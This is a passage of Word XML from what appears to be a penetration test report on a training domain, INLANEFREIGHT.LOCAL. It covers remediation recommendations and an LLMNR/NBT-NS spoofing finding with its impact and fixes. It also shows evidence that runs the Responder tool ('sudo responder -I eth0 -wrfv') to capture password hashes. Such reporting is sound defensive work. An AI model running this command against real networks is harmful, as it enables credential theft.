    <w:p w14:paraId="1E988362" w14:textId="6E3EAB1A" w:rsidR="00393946" w:rsidRPr="00DE35E7" w:rsidRDefault="00393946" w:rsidP="00393946">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>Finding 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">] – Consider limiting access to the Tomcat Manager to localhost or specific IP Addresses </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB1929" w14:textId="443B89E8" w:rsidR="00B7507B" w:rsidRPr="00DE35E7" w:rsidRDefault="00393946" w:rsidP="00B7507B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:r w:rsidR="00DE35E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">] – </w:t>
      </w:r>
      <w:r w:rsidR="00B7507B" w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Perform a network file share audit</w:t>
      </w:r>
      <w:r w:rsidR="00D71552" w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B2A02A" w14:textId="3AB45CC0" w:rsidR="00B807BB" w:rsidRPr="00DE35E7" w:rsidRDefault="00393946" w:rsidP="00B7507B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00DE35E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>Finding 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">] – </w:t>
      </w:r>
      <w:r w:rsidR="00B807BB" w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">Enhance network logging and monitoring </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E86816C" w14:textId="2DCE4D96" w:rsidR="00B7507B" w:rsidRPr="00DE35E7" w:rsidRDefault="00393946" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00DE35E7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>Finding 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">] – </w:t>
      </w:r>
      <w:r w:rsidR="00B807BB" w:rsidRPr="00DE35E7">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement an enterprise endpoint detection &amp; response solution </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C6B5BC" w14:textId="37B09CE0" w:rsidR="00390B73" w:rsidRPr="00390B73" w:rsidRDefault="00390B73" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc106718130"/>
      <w:r w:rsidRPr="00CA74E4">
        <w:t>Long Term</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="671EFDAB" w14:textId="44D22A42" w:rsidR="00D71552" w:rsidRPr="00DE35E7" w:rsidRDefault="00B807BB" w:rsidP="00DE35E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:t>Perform</w:t>
      </w:r>
      <w:r w:rsidR="00B7507B" w:rsidRPr="00DE35E7">
        <w:t xml:space="preserve"> ongoing internal network vulnerability assessments and domain password audits</w:t>
      </w:r>
      <w:r w:rsidR="00D71552" w:rsidRPr="00DE35E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAC0090" w14:textId="10D9EC11" w:rsidR="00C64082" w:rsidRPr="00DE35E7" w:rsidRDefault="00C64082" w:rsidP="00DE35E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:t>Perform periodic Active Directory security assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C662F6" w14:textId="62896603" w:rsidR="00D71552" w:rsidRPr="00DE35E7" w:rsidRDefault="00B7507B" w:rsidP="00DE35E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:t>Educate systems and network administrators and developers on security hardening best practices</w:t>
      </w:r>
      <w:r w:rsidR="00D71552" w:rsidRPr="00DE35E7">
        <w:t xml:space="preserve"> compromise</w:t>
      </w:r>
      <w:r w:rsidR="00B807BB" w:rsidRPr="00DE35E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1213EF" w14:textId="3C1DAAF1" w:rsidR="00D71552" w:rsidRPr="00DE35E7" w:rsidRDefault="00B7507B" w:rsidP="00DE35E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE35E7">
        <w:t>Enhance network segmentation to isolate critical hosts</w:t>
      </w:r>
      <w:r w:rsidR="00D71552" w:rsidRPr="00DE35E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B807BB" w:rsidRPr="00DE35E7">
        <w:t>and limit the effects of an internal compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3A7377" w14:textId="5ACF4EE2" w:rsidR="00B7507B" w:rsidRPr="00BC2D06" w:rsidRDefault="00B7507B" w:rsidP="00B807BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B8235DB" w14:textId="77777777" w:rsidR="00390B73" w:rsidRDefault="00390B73" w:rsidP="00390B73"/>
    <w:p w14:paraId="6D58C55C" w14:textId="77777777" w:rsidR="00390B73" w:rsidRPr="00390B73" w:rsidRDefault="00390B73" w:rsidP="00390B73"/>
    <w:p w14:paraId="5C2390D4" w14:textId="694D4029" w:rsidR="00B7507B" w:rsidRPr="00BC2D06" w:rsidRDefault="00B7507B" w:rsidP="00BC2D06">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265F49FD" w14:textId="77777777" w:rsidR="00390B73" w:rsidRDefault="00390B73">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC2BE2E" w14:textId="0D7F217C" w:rsidR="00216BB8" w:rsidRDefault="00216BB8" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc106718131"/>
      <w:r w:rsidRPr="00042DC8">
        <w:lastRenderedPageBreak/>
        <w:t>Technical Findings Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="273F41C8" w14:textId="613438EF" w:rsidR="003260D5" w:rsidRPr="00520B63" w:rsidRDefault="003260D5" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="FindingTitle"/>
      </w:pPr>
      <w:r>
        <w:t>LLMNR/NBT-NS Response Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="006372B6">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="006372B6">
        <w:rPr>
          <w:color w:val="FF3E3E"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="11016" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2358"/>
        <w:gridCol w:w="8658"/>
      </w:tblGrid>
      <w:tr w:rsidR="003260D5" w:rsidRPr="00B96066" w14:paraId="4AD99F42"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40CB6AED" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56D1D4B2" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579" w:rsidP="00BC21AF">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19" w:history="1">
              <w:r w:rsidR="003260D5" w:rsidRPr="007D1F5C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>CWE-522</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003260D5" w:rsidRPr="00B96066" w14:paraId="0687804A"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19BF84B7" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVSS 3.1 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63531CDF" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5"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9.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003260D5" w:rsidRPr="00B96066" w14:paraId="2A1349A1"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1751523B" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Description (Incl. Root Cause)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="189C9D7E" w14:textId="070C65CA" w:rsidR="0001530A" w:rsidRPr="0001530A" w:rsidRDefault="0001530A" w:rsidP="0001530A">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530A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an </w:t>
            </w:r>
            <w:r w:rsidR="001C6D4A" w:rsidRPr="0001530A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>adversary-controlled</w:t>
            </w:r>
            <w:r w:rsidRPr="0001530A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> system. This activity may be used to collect or relay authentication materials.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25CC4F84" w14:textId="6DB50F1E" w:rsidR="003260D5" w:rsidRPr="0001530A" w:rsidRDefault="0001530A" w:rsidP="0001530A">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530A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>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r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003260D5" w:rsidRPr="00B96066" w14:paraId="3EB2CD5A"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40FC74B0" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Security Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76AC5620" w14:textId="353F3735" w:rsidR="0001530A" w:rsidRPr="0001530A" w:rsidRDefault="0001530A" w:rsidP="0001530A">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Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the </w:t>
            </w:r>
            <w:r w:rsidR="001C6D4A" w:rsidRPr="0001530A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>adversary-controlled</w:t>
            </w:r>
            <w:r w:rsidRPr="0001530A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the </w:t>
            </w:r>
            <w:r w:rsidR="001C6D4A" w:rsidRPr="0001530A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>adversary-controlled</w:t>
            </w:r>
            <w:r w:rsidRPr="0001530A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">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w:t>
            </w:r>
            <w:r w:rsidR="001C6D4A" w:rsidRPr="0001530A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>adversary-controlled</w:t>
            </w:r>
            <w:r w:rsidRPr="0001530A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system relay step can happen in conjunction with poisoning but may also be independent of it.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30155D8E" w14:textId="4C70F5AC" w:rsidR="003260D5" w:rsidRPr="0001530A" w:rsidRDefault="0001530A" w:rsidP="0001530A">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Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003260D5" w:rsidRPr="00B96066" w14:paraId="2AFE6922"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C7CDB72" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Affected Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CFB97E2" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0001530A" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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530A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>INLANEFREIGHT.LOCAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003260D5" w:rsidRPr="00B96066" w14:paraId="5559ABCC"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7D140162" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62DBA719"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Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22247A87"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Use host-based security software to block LLMNR/NetBIOS traffic. Enabling SMB Signing can stop NTLMv2 relay attacks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A4C3D2A"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Network intrusion detection and prevention systems that can identify traffic patterns indicative of MiTM activity can be used to mitigate activity at the network level.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F218E37" w14:textId="69D36420" w:rsidR="003260D5"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Network segmentation can be used to isolate infrastructure components that do not require broad network access. This may mitigate, or at least alleviate, the scope of MiTM activity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003260D5" w:rsidRPr="00B96066" w14:paraId="53C33B60"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C208673" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="003260D5" w:rsidP="00BC21AF">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>External References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36D2E5B6" w14:textId="48AF6455" w:rsidR="003260D5" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579" w:rsidP="00BC21AF">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0" w:history="1">
              <w:r w:rsidR="003260D5" w:rsidRPr="005B6982">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1557/001/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="003260D5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D87DDB9" w14:textId="77777777" w:rsidR="003260D5" w:rsidRDefault="003260D5" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="EvidencePreamble"/>
      </w:pPr>
      <w:r>
        <w:t>Finding Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1051FDFE" w14:textId="506615EF" w:rsidR="003260D5" w:rsidRDefault="00480C45" w:rsidP="003260D5">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Running the </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="004B0583">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Responder</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> tool to attempt to obtain user account password hashes</w:t>
      </w:r>
      <w:r w:rsidR="003260D5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10800"/>
      </w:tblGrid>
      <w:tr w:rsidR="003260D5" w14:paraId="1878829A" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C2B992D" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="00F43CFC" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43CFC">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>sudo responder -I eth0 -wrfv</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FA04937" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="13256BBF" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">                                         __</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DA32AAC" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  .----.-----.-----.-----.-----.-----.--|  |.-----.----.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17A8C960" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="414226E4" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  |__| |_____|_____|   __|_____|__|__|_____||_____|__|</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21DAC974" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">                   |__|</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="616F2BB3" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="00EC5397" w14:textId="77777777" w:rsidR="003260D5" w:rsidRPr="0049567A" w:rsidRDefault="003260D5" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
